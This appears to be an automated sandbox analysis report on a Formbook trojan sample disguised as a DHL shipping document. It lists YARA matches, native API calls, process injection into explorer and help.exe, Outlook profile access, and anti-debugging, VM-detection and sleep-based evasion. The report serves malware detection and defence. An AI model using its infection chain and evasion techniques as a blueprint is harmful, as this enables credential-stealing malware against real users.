Source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Detected potential crypto function
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_00406D5F 0_2_00406D5F
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_00410371 1_2_00410371
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00403873 3_2_00403873
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00421964 3_2_00421964
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00401B50 3_2_00401B50
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_004055CA 3_2_004055CA
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_004055D3 3_2_004055D3
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00420583 3_2_00420583
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0042163A 3_2_0042163A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0042163D 3_2_0042163D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0040BF6F 3_2_0040BF6F
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0040BF73 3_2_0040BF73
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00421F29 3_2_00421F29
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_004017C0 3_2_004017C0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_004057F3 3_2_004057F3
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_004017B1 3_2_004017B1
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A520A0 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF20A8 3_2_00AF20A8
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3B090 3_2_00A3B090
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AE1002 3_2_00AE1002
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A44120 3_2_00A44120
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A2F900 3_2_00A2F900
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF22AE 3_2_00AF22AE
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A5EBB0 3_2_00A5EBB0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AEDBD2 3_2_00AEDBD2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF2B28 3_2_00AF2B28
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3841F 3_2_00A3841F
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A52581 3_2_00A52581
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A3D5E0 3_2_00A3D5E0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A20D20 3_2_00A20D20
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF2D07 3_2_00AF2D07
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF1D55 3_2_00AF1D55
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF2EF7 3_2_00AF2EF7
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A46E30 3_2_00A46E30
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00AF1FF1 3_2_00AF1FF1
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: String function: 004019C0 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: String function: 00A2B150 appears 35 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041E4A3 NtCreateFile, 3_2_0041E4A3
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041E553 NtReadFile, 3_2_0041E553
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041E5D3 NtClose, 3_2_0041E5D3
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041E683 NtAllocateVirtualMemory, 3_2_0041E683
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041E4F5 NtReadFile, 3_2_0041E4F5
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041E49E NtCreateFile, 3_2_0041E49E
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041E5CD NtClose, 3_2_0041E5CD
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041E5FF NtClose, 3_2_0041E5FF
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041E59D NtClose, 3_2_0041E59D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041E67D NtAllocateVirtualMemory, 3_2_0041E67D
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A698F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_00A698F0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_00A69860
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69840 NtDelayExecution,LdrInitializeThunk, 3_2_00A69840
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A699A0 NtCreateSection,LdrInitializeThunk, 3_2_00A699A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_00A69910
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69A20 NtResumeThread,LdrInitializeThunk, 3_2_00A69A20
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_00A69A00
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69A50 NtCreateFile,LdrInitializeThunk, 3_2_00A69A50
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A695D0 NtClose,LdrInitializeThunk, 3_2_00A695D0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69540 NtReadFile,LdrInitializeThunk, 3_2_00A69540
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A696E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00A696E0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_00A69660
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A697A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_00A697A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69780 NtMapViewOfSection,LdrInitializeThunk, 3_2_00A69780
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69FE0 NtCreateMutant,LdrInitializeThunk, 3_2_00A69FE0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69710 NtQueryInformationToken,LdrInitializeThunk, 3_2_00A69710
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A698A0 NtWriteVirtualMemory, 3_2_00A698A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69820 NtEnumerateKey, 3_2_00A69820
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A6B040 NtSuspendThread, 3_2_00A6B040
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A699D0 NtCreateProcessEx, 3_2_00A699D0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69950 NtQueueApcThread, 3_2_00A69950
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69A80 NtOpenDirectoryObject, 3_2_00A69A80
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69A10 NtQuerySection, 3_2_00A69A10
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A6A3B0 NtGetContextThread, 3_2_00A6A3B0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69B00 NtSetValueKey, 3_2_00A69B00
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A695F0 NtQueryInformationFile, 3_2_00A695F0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69520 NtWaitForSingleObject, 3_2_00A69520
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A6AD30 NtSetContextThread, 3_2_00A6AD30
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69560 NtWriteFile, 3_2_00A69560
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A696D0 NtCreateKey, 3_2_00A696D0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69610 NtEnumerateValueKey, 3_2_00A69610
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69670 NtQueryInformationProcess, 3_2_00A69670
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69650 NtQueryValueKey, 3_2_00A69650
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69730 NtQueryVirtualMemory, 3_2_00A69730
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A6A710 NtOpenProcessToken, 3_2_00A6A710
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69760 NtOpenProcess, 3_2_00A69760
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A69770 NtSetInformationFile, 3_2_00A69770
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A6A770 NtOpenThread, 3_2_00A6A770
Source: DHL_SHIPPING_DOCUMENT.exe ReversingLabs: Detection: 25%
Source: DHL_SHIPPING_DOCUMENT.exe Virustotal: Detection: 39%
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe File read: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Jump to behavior
Source: DHL_SHIPPING_DOCUMENT.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Process created: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe "C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Process created: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Process created: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe "C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Process created: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe Jump to behavior
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe File created: C:\Users\user\AppData\Local\Temp\nsu5B22.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@12/5@9/8
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_004021AA CoCreateInstance, 0_2_004021AA
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404AB5
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2168:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Command line argument: A 1_2_00410940
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: DHL_SHIPPING_DOCUMENT.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: eixfhzlwqd.exe, 00000001.00000003.319488467.000000001A150000.00000004.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000001.00000003.314926280.0000000019FC0000.00000004.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000B1F000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.320016666.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.321428954.000000000086B000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000005.00000003.357421969.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002F6F000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: eixfhzlwqd.exe, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000B1F000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.320016666.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, eixfhzlwqd.exe, 00000003.00000003.321428954.000000000086B000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, help.exe, 00000005.00000003.357421969.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, help.exe, 00000005.00000002.581390934.0000000002F6F000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: help.pdbGCTL source: eixfhzlwqd.exe, 00000003.00000002.357434868.00000000005E0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: help.pdb source: eixfhzlwqd.exe, 00000003.00000002.357434868.00000000005E0000.00000040.10000000.00040000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Unpacked PE file: 3.2.eixfhzlwqd.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_00410AA4 push ecx; ret 1_2_00410AB7
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00410928 push ebx; retf 3_2_00410955
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00410933 push ebx; retf 3_2_00410955
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041EA5C push ecx; retf 3_2_0041EA5E
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041AA67 push ebx; retf 3_2_0041AA6C
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0040DB29 pushad ; retf 3_2_0040DB2A
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041B4E4 push edi; iretd 3_2_0041B4EA
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00410CFB push esi; ret 3_2_00410D04
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00401DA0 push eax; ret 3_2_00401DA2
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041A6D0 push cs; iretd 3_2_0041A6CF
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041A6AC push cs; iretd 3_2_0041A6CF
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0040A706 push ds; retf 3_2_0040A707
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0040CF3E push ebp; iretd 3_2_0040CF3F
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0040D7FC push eax; iretd 3_2_0040D7FD
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_0041B79D push esi; ret 3_2_0041B79E
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A7D0D1 push ecx; ret 3_2_00A7D0E4
Drops PE files
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe File created: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Jump to dropped file
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\help.exe TID: 3736 Thread sleep time: -52000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A56A60 rdtscp 3_2_00A56A60
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 881 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 867 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe API coverage: 9.3 %
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_004089F8 FindFirstFileExW, 1_2_004089F8
Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000004.00000003.451856670.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000003.451856670.000000000834F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
Source: explorer.exe, 00000004.00000000.329318562.00000000059F0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: explorer.exe, 00000004.00000000.333026756.0000000008394000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000003.448362246.000000000CDE5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 00000004.00000003.573202174.000000000D009000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.447763601.000000000CFFD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.446800528.000000000CFC9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.551908862.000000000D009000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
Source: explorer.exe, 00000004.00000003.451856670.000000000830B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_0040636B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040636B
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 1_2_0040B0AF GetProcessHeap, 1_2_0040B0AF
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A56A60 rdtscp 3_2_00A56A60
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h] 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h] 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h] 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h] 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe Code function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h] 3_2_00A520A0
